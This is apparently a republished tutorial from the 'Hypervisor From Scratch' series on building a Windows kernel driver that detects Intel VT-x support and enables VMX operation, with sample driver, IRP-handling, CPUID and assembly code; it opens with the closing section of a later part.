12345678910111213NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] DrvClose Called !»);  // executing VMXOFF on every logical processor Terminate_VMX();  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

Now, run the code, In the case of creating the handle (You can see that our regions allocated successfully).

VMX Regions

And when we call CloseHandle from user mode:


Source code

The source code of this part of the tutorial is available on my GitHub.


In this part we learned about different types of IOCTL Dispatching, then we see different functions in Windows to manage our hypervisor VMM and we initialized the VMXON Regions and VMCS Regions then we terminate them.

In the future part, we’ll focus on VMCS and different actions that can be performed in VMCS Regions in order to control our guest software.


[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] Windows Driver Samples (https://github.com/Microsoft/Windows-driver-samples)

[3] Driver Development Part 2: Introduction to Implementing IOCTLs (https://www.codeproject.com/Articles/9575/Driver-Development-Part-2-Introduction-to-Implemen)

[3] Hyperplatform (https://github.com/tandasat/HyperPlatform)

[4] PAGED_CODE macro (https://technet.microsoft.com/en-us/ff558773(v=vs.96))

[5] HVPP (https://github.com/wbenny/hvpp)

[6] HyperBone Project (https://github.com/DarthTon/HyperBone)

[7] Memory Caching Types (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ne-wdm-_memory_caching_type)

[8] What is write-back cache? (https://whatis.techtarget.com/definition/write-back)

Hypervisor From Scratch – Part 2: Entering VMX Operation

Original text bySinaei )

Hi guys,

It’s the second part of a multiple series of a tutorial called “Hypervisor From Scratch”, First I highly recommend to read the first part (Basic Concepts & Configure Testing Environment) before reading this part, as it contains the basic knowledge you need to know in order to understand the rest of this tutorial.

In this section, we will learn about Detecting Hypervisor Support for our processor, then we simply config the basic stuff to Enable VMX and Entering VMX Operation and a lot more thing about Window Driver Kit (WDK).

Configuring Our IRP Major Functions

Beside our kernel-mode driver (“MyHypervisorDriver“), I created a user-mode application called “MyHypervisorApp“, first of all (The source code is available in my GitHub), I should encourage you to write most of your codes in user-mode rather than kernel-mode and that’s because you might not have handled exceptions so it leads to BSODs, or on the other hand, running less code in kernel-mode reduces the possibility of putting some nasty kernel-mode bugs.

If you remember from the previous part, we create some Windows Driver Kit codes, now we want to develop our project to support more IRP Major Functions.

IRP Major Functions are located in a conventional Windows table that is created for every device, once you register your device in Windows, you have to introduce these functions in which you handle these IRP Major Functions. That’s like every device has a table of its Major Functions and everytime a user-mode application calls any of these functions, Windows finds the corresponding function (if device driver supports that MJ Function) based on the device that requested by the user and calls it then pass an IRP pointer to the kernel driver.

Now its responsibility of device function to check the privileges or etc.

The following code creates the device :

12345678910111213 NTSTATUS NtStatus = STATUS_SUCCESS; UINT64 uiIndex = 0; PDEVICE_OBJECT pDeviceObject = NULL; UNICODE_STRING usDriverName, usDosDeviceName;  DbgPrint(«[*] DriverEntry Called.»);   RtlInitUnicodeString(&usDriverName, L»\\Device\\MyHypervisorDevice»); RtlInitUnicodeString(&usDosDeviceName, L»\\DosDevices\\MyHypervisorDevice»);  NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject); NTSTATUS NtStatusSymLinkResult = IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);

Note that our device name is “\Device\MyHypervisorDevice.

After that, we need to introduce our Major Functions for our device.

1234567891011121314151617 if (NtStatus == STATUS_SUCCESS && NtStatusSymLinkResult == STATUS_SUCCESS) { for (uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++) pDriverObject->MajorFunction[uiIndex] = DrvUnsupported;  DbgPrint(«[*] Setting Devices major functions.»); pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DrvClose; pDriverObject->MajorFunction[IRP_MJ_CREATE] = DrvCreate; pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvIOCTLDispatcher; pDriverObject->MajorFunction[IRP_MJ_READ] = DrvRead; pDriverObject->MajorFunction[IRP_MJ_WRITE] = DrvWrite;  pDriverObject->DriverUnload = DrvUnload; } else { DbgPrint(«[*] There was some errors in creating device.»); }

You can see that I put “DrvUnsupported” to all functions, this is a function to handle all MJ Functions and told the user that it’s not supported. The main body of this function is like this:

12345678910NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] This function is not supported 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

We also introduce other major functions that are essential for our device, we’ll complete the implementation in the future, let’s just leave them alone.

12345678910111213141516171819202122232425262728293031323334353637383940414243NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

Now let’s see IRP MJ Functions list and other types of Windows Driver Kit handlers routine.

IRP Major Functions List

This is a list of IRP Major Functions which we can use in order to perform different operations.

123456789101112131415161718192021222324252627282930#define IRP_MJ_CREATE                   0x00#define IRP_MJ_CREATE_NAMED_PIPE        0x01#define IRP_MJ_CLOSE                    0x02#define IRP_MJ_READ                     0x03#define IRP_MJ_WRITE                    0x04#define IRP_MJ_QUERY_INFORMATION        0x05#define IRP_MJ_SET_INFORMATION          0x06#define IRP_MJ_QUERY_EA                 0x07#define IRP_MJ_SET_EA                   0x08#define IRP_MJ_FLUSH_BUFFERS            0x09#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b#define IRP_MJ_DIRECTORY_CONTROL        0x0c#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d#define IRP_MJ_DEVICE_CONTROL           0x0e#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f#define IRP_MJ_SHUTDOWN                 0x10#define IRP_MJ_LOCK_CONTROL             0x11#define IRP_MJ_CLEANUP                  0x12#define IRP_MJ_CREATE_MAILSLOT          0x13#define IRP_MJ_QUERY_SECURITY           0x14#define IRP_MJ_SET_SECURITY             0x15#define IRP_MJ_POWER                    0x16#define IRP_MJ_SYSTEM_CONTROL           0x17#define IRP_MJ_DEVICE_CHANGE            0x18#define IRP_MJ_QUERY_QUOTA              0x19#define IRP_MJ_SET_QUOTA                0x1a#define IRP_MJ_PNP                      0x1b#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      // Obsolete….#define IRP_MJ_MAXIMUM_FUNCTION         0x1b

Every major function will only trigger if we call its corresponding function from user-mode. For instance, there is a function (in user-mode) called CreateFile (And all its variants like CreateFileA and CreateFileW for ASCII and Unicode) so everytime we call CreateFile the function that registered as IRP_MJ_CREATE will be called or if we call ReadFile then IRP_MJ_READ and WriteFile then IRP_MJ_WRITE  will be called. You can see that Windows treats its devices like files and everything we need to pass from user-mode to kernel-mode is available in PIRP Irp as a buffer when the function is called.

In this case, Windows is responsible to copy user-mode buffer to kernel mode stack.

Don’t worry we use it frequently in the rest of the project but we only support IRP_MJ_CREATE in this part and left others unimplemented for our future parts.

IRP Minor Functions

IRP Minor functions are mainly used for PnP manager to notify for a special event, for example,The PnP manager sends IRP_MN_START_DEVICE  after it has assigned hardware resources, if any, to the device or The PnP manager sends IRP_MN_STOP_DEVICE to stop a device so it can reconfigure the device’s hardware resources.

We will need these minor functions later in these series.

A list of IRP Minor Functions is available below:


Fast I/O

For optimizing VMM, you can use Fast I/O which is a different way to initiate I/O operations that are faster than IRP. Fast I/O operations are always synchronous.

According to MSDN:

Fast I/O is specifically designed for rapid synchronous I/O on cached files. In fast I/O operations, data is transferred directly between user buffers and the system cache, bypassing the file system and the storage driver stack. (Storage drivers do not use fast I/O.) If all of the data to be read from a file is resident in the system cache when a fast I/O read or write request is received, the request is satisfied immediately. 

When the I/O Manager receives a request for synchronous file I/O (other than paging I/O), it invokes the fast I/O routine first. If the fast I/O routine returns TRUE, the operation was serviced by the fast I/O routine. If the fast I/O routine returns FALSE, the I/O Manager creates and sends an IRP instead.

The definition of Fast I/O Dispatch table is:

123456789101112131415161718192021222324252627282930typedef struct _FAST_IO_DISPATCH {  ULONG                                  SizeOfFastIoDispatch;  PFAST_IO_CHECK_IF_POSSIBLE             FastIoCheckIfPossible;  PFAST_IO_READ                          FastIoRead;  PFAST_IO_WRITE                         FastIoWrite;  PFAST_IO_QUERY_BASIC_INFO              FastIoQueryBasicInfo;  PFAST_IO_QUERY_STANDARD_INFO           FastIoQueryStandardInfo;  PFAST_IO_LOCK                          FastIoLock;  PFAST_IO_UNLOCK_SINGLE                 FastIoUnlockSingle;  PFAST_IO_UNLOCK_ALL                    FastIoUnlockAll;  PFAST_IO_UNLOCK_ALL_BY_KEY             FastIoUnlockAllByKey;  PFAST_IO_DEVICE_CONTROL                FastIoDeviceControl;  PFAST_IO_ACQUIRE_FILE                  AcquireFileForNtCreateSection;  PFAST_IO_RELEASE_FILE                  ReleaseFileForNtCreateSection;  PFAST_IO_DETACH_DEVICE                 FastIoDetachDevice;  PFAST_IO_QUERY_NETWORK_OPEN_INFO       FastIoQueryNetworkOpenInfo;  PFAST_IO_ACQUIRE_FOR_MOD_WRITE         AcquireForModWrite;  PFAST_IO_MDL_READ                      MdlRead;  PFAST_IO_MDL_READ_COMPLETE             MdlReadComplete;  PFAST_IO_PREPARE_MDL_WRITE             PrepareMdlWrite;  PFAST_IO_MDL_WRITE_COMPLETE            MdlWriteComplete;  PFAST_IO_READ_COMPRESSED               FastIoReadCompressed;  PFAST_IO_WRITE_COMPRESSED              FastIoWriteCompressed;  PFAST_IO_MDL_READ_COMPLETE_COMPRESSED  MdlReadCompleteCompressed;  PFAST_IO_MDL_WRITE_COMPLETE_COMPRESSED MdlWriteCompleteCompressed;  PFAST_IO_QUERY_OPEN                    FastIoQueryOpen;  PFAST_IO_RELEASE_FOR_MOD_WRITE         ReleaseForModWrite;  PFAST_IO_ACQUIRE_FOR_CCFLUSH           AcquireForCcFlush;  PFAST_IO_RELEASE_FOR_CCFLUSH           ReleaseForCcFlush;} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;

Defined Headers

I created the following headers (source.h) for my driver.

12345678910111213141516171819202122232425262728293031323334#pragma once#include <ntddk.h>#include <wdf.h>#include <wdm.h> extern void inline Breakpoint(void);extern void inline Enable_VMX_Operation(void);  NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath);VOID DrvUnload(PDRIVER_OBJECT  DriverObject);NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvIOCTLDispatcher(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); VOID PrintChars(_In_reads_(CountChars) PCHAR BufferAddress, _In_ size_t CountChars);VOID PrintIrpInfo(PIRP Irp); #pragma alloc_text(INIT, DriverEntry)#pragma alloc_text(PAGE, DrvUnload)#pragma alloc_text(PAGE, DrvCreate)#pragma alloc_text(PAGE, DrvRead)#pragma alloc_text(PAGE, DrvWrite)#pragma alloc_text(PAGE, DrvClose)#pragma alloc_text(PAGE, DrvUnsupported)#pragma alloc_text(PAGE, DrvIOCTLDispatcher)   // IOCTL Codes and Its meanings#define IOCTL_TEST 0x1 // In case of testing

Now just compile your driver.

Loading Driver and Check the presence of Device

In order to load our driver (MyHypervisorDriver) first download OSR Driver Loader, then run Sysinternals DbgView as administrator make sure that your DbgView captures the kernel (you can check by going Capture -> Capture Kernel).

Enable Capturing Event

After that open the OSR Driver Loader (go to OsrLoader -> kit-> WNET -> AMD64 -> FRE) and open OSRLOADER.exe (in an x64 environment). Now if you built your driver, find .sys file (in MyHypervisorDriver\x64\Debug\ should be a file named: “MyHypervisorDriver.sys”), in OSR Driver Loader click to browse and select (MyHypervisorDriver.sys) and then click to “Register Service” after the message box that shows your driver registered successfully, you should click on “Start Service”.

Please note that you should have WDK installed for your Visual Studio in order to be able building your project.

Load Driver in OSR Driver Loader

Now come back to DbgView, then you should see that your driver loaded successfully and a message “[*] DriverEntry Called. ” should appear.

If there is no problem then you’re good to go, otherwise, if you have a problem with DbgView you can check the next step.

Keep in mind that now you registered your driver so you can use SysInternals WinObj in order to see whether “MyHypervisorDevice” is available or not.


The Problem with DbgView

Unfortunately, for some unknown reasons, I’m not able to view the result of DbgPrint(), If you can see the result then you can skip this step but if you have a problem, then perform the following steps:

As I mentioned in part 1:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that , add a DWORD value named IHVDRIVER with a value of 0xFFFF

Reboot the machine and you’ll good to go.

It always works for me and I tested on many computers but my MacBook seems to have a problem.

In order to solve this problem, you need to find a Windows Kernel Global variable called, nt!Kd_DEFAULT_Mask, this variable is responsible for showing the results in DbgView, it has a mask that I’m not aware of so I just put a 0xffffffff in it to simply make it shows everything!

To do this, you need a Windows Local Kernel Debugging using Windbg.

  1. Open a Command Prompt window as Administrator. Enter bcdedit /debug on
  2. If the computer is not already configured as the target of a debug transport, enter bcdedit /dbgsettings local
  3. Reboot the computer.

After that you need to open Windbg with UAC Administrator privilege, go to File > Kernel Debug > Local > press OK and in you local Windbg find the nt!Kd_DEFAULT_Mask using the following command :

12prlkd> x nt!kd_Default_Maskfffff801`f5211808 nt!Kd_DEFAULT_Mask = <no type information>

Now change it value to 0xffffffff.

1lkd> eb fffff801`f5211808 ff ff ff ff

After that, you should see the results and now you’ll good to go.

Remember this is an essential step for the rest of the topic, because if we can’t see any kernel detail then we can’t debug.


Detecting Hypervisor Support

Discovering support for vmx is the first thing that you should consider before enabling VT-x, this is covered in Intel Software Developer’s Manual volume 3C in section 23.6 DISCOVERING SUPPORT FOR VMX.

You could know the presence of VMX using CPUID if CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.

First of all, we need to know if we’re running on an Intel-based processor or not, this can be understood by checking the CPUID instruction and find vendor string “GenuineIntel“.

The following function returns the vendor string form CPUID instruction.

12345678910111213141516171819202122232425262728293031323334353637string GetCpuID(){ //Initialize used variables char SysType[13]; //Array consisting of 13 single bytes/characters string CpuID; //The string that will be used to add all the characters to   //Starting coding in assembly language _asm { //Execute CPUID with EAX = 0 to get the CPU producer XOR EAX, EAX CPUID //MOV EBX to EAX and get the characters one by one by using shift out right bitwise operation. MOV EAX, EBX MOV SysType[0], al MOV SysType[1], ah SHR EAX, 16 MOV SysType[2], al MOV SysType[3], ah //Get the second part the same way but these values are stored in EDX MOV EAX, EDX MOV SysType[4], al MOV SysType[5], ah SHR EAX, 16 MOV SysType[6], al MOV SysType[7], ah //Get the third part MOV EAX, ECX MOV SysType[8], al MOV SysType[9], ah SHR EAX, 16 MOV SysType[10], al MOV SysType[11], ah MOV SysType[12], 00 } CpuID.assign(SysType, 12); return CpuID;}

The last step is checking for the presence of VMX, you can check it using the following code :

1234567891011121314151617181920bool VMX_Support_Detection(){  bool VMX = false; __asm { xor    eax, eax inc    eax cpuid bt     ecx, 0x5 jc     VMXSupport VMXNotSupport : jmp     NopInstr VMXSupport : mov    VMX, 0x1 NopInstr : nop }  return VMX;}

As you can see it checks CPUID with EAX=1 and if the 5th (6th) bit is 1 then the VMX Operation is supported. We can also perform the same thing in Kernel Driver.

All in all, our main code should be something like this:

123456789101112131415161718192021222324252627int main(){ string CpuID; CpuID = GetCpuID(); cout << «[*] The CPU Vendor is : » << CpuID << endl; if (CpuID == «GenuineIntel») { cout << «[*] The Processor virtualization technology is VT-x. \n»; } else { cout << «[*] This program is not designed to run in a non-VT-x environemnt !\n»; return 1; } if (VMX_Support_Detection()) { cout << «[*] VMX Operation is supported by your processor .\n»; } else { cout << «[*] VMX Operation is not supported by your processor .\n»; return 1; } _getch();    return 0;}

The final result:

User-mode app

Enabling VMX Operation

If our processor supports the VMX Operation then its time to enable it. As I told you above, IRP_MJ_CREATE is the first function that should be used to start the operation.

Form Intel Software Developer’s Manual (23.7 ENABLING AND ENTERING VMX OPERATION):

Before system software can enter VMX operation, it enables VMX by setting CR4.VMXE[bit 13] = 1. VMX operation is then entered by executing the VMXON instruction. VMXON causes an invalid-opcode exception (#UD) if executed with CR4.VMXE = 0. Once in VMX operation, it is not possible to clear CR4.VMXE. System software leaves VMX operation by executing the VMXOFF instruction. CR4.VMXE can be cleared outside of VMX operation after executing of VMXOFF.
VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

  •  Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both, as well as the lock bit.
  •  Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.
  •  Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.

Setting CR4 VMXE Bit

Do you remember the previous part where I told you how to create an inline assembly in Windows Driver Kit x64

Now you should create some function to perform this operation in assembly.

Just in Header File (in my case Source.h) declare your function:

1extern void inline Enable_VMX_Operation(void);

Then in assembly file (in my case SourceAsm.asm) add this function (Which set the 13th (14th) bit of Cr4).

1234567891011Enable_VMX_Operation PROC PUBLICpush rax ; Save the state xor rax,rax ; Clear the RAXmov rax,cr4or rax,02000h         ; Set the 14th bitmov cr4,rax pop rax ; Restore the stateretEnable_VMX_Operation ENDP

Also, declare your function in the above of SourceAsm.asm.

1PUBLIC Enable_VMX_Operation

The above function should be called in DrvCreate:

123456NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ Enable_VMX_Operation(); // Enabling VMX Operation DbgPrint(«[*] VMX Operation Enabled Successfully !»); return STATUS_SUCCESS;}

At last, you should call the following function from the user-mode:

123456789 HANDLE hWnd = CreateFile(L»\\\\.\\MyHypervisorDevice», GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, /// lpSecurityAttirbutes OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); /// lpTemplateFile

If you see the following result, then you completed the second part successfully.

Final Show

Important Note: Please consider that your .asm file should have a different name from your driver main file (.c file) for example if your driver file is “Source.c” then using the name “Source.asm” causes weird linking errors in Visual Studio, you should change the name of you .asm file to something like “SourceAsm.asm” to avoid these kinds of linker errors.


In this part, you learned about basic stuff you to know in order to create a Windows Driver Kit program and then we entered to our virtual environment so we build a cornerstone for the rest of the parts.

In the third part, we’re getting deeper with Intel VT-x and make our driver even more advanced so wait, it’ll be ready soon!

The source code of this topic is available at :



[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] IRP_MJ_DEVICE_CONTROL (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-device-control)

[3]  Windows Driver Kit Samples (https://github.com/Microsoft/Windows-driver-samples/blob/master/general/ioctl/wdm/sys/sioctl.c)

[4] Setting Up Local Kernel Debugging of a Single Computer Manually (https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-local-kernel-debugging-of-a-single-computer-manually)

[5] Obtain processor manufacturer using CPUID (https://www.daniweb.com/programming/software-development/threads/112968/obtain-processor-manufacturer-using-cpuid)

[6] Plug and Play Minor IRPs (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/plug-and-play-minor-irps)

[7] _FAST_IO_DISPATCH structure (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_fast_io_dispatch)

[8] Filtering IRPs and Fast I/O (https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filtering-irps-and-fast-i-o)

[9] Windows File System Filter Driver Development (https://www.apriorit.com/dev-blog/167-file-system-filter-driver)